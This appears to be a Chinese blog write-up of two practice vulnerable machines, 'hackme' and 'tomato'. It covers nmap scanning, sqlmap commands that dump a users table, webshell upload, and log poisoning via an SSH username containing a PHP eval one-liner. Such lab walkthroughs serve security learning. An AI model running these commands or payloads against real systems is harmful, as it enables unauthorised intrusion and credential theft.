hackme靶机
1.扫描靶机IP
靶机搭好后
扫描我们靶机的IP
nmap -O 192.168.187.128/24
扫描到靶机的IP后去访问他
2.信息收集
挨个访问后有文件上传的路径;uploads
网站登录界面;login.php
3.寻找薄弱点
网页首页是个登录界面,注册个账号登录看看
登录后的界面
判断是否存在SQL注入
发现是字符型注入
4.漏洞利用
sqlmap一跑就出来了
#手工sqlmap
python sqlmap.py -r 1.txt --dbs --tables --columns --batch
python sqlmap.py -r 1.txt -D webapphacking -T users --dump --batch
发现了superadmin去md5解密获取密码
Uncrackable
5.获取shell
登陆后来到了文件上传
上传我们的木马文件
蚁剑连接
\
连接成功
tomato靶机
1.扫描靶机IP
靶机搭好后
扫描我们靶机的IP
扫描到靶机的IP后去访问他
2.信息收集
有一个目录网站
3.寻找薄弱点
在phpinfo中可以看到网站的绝对路径和当前用户
phpinfo源代码有给include的函数
4.漏洞利用
利用一下include函数去尝试读取其他文件
读取到了就来看一下日志文件
我们可以利用报错连接来运行我们的一句话
利用MobaXterm来连接SSH
这就可以了
或者用kali输入命令
ssh '<?php @eval($_POST[cmd]);?>'@192.168.187.131 -p 2211
连接成功
标签:tomato,sqlmap,文件,--,IP,扫描,靶机,hackme From: https://blog.csdn.net/2302_80256359/article/details/144653885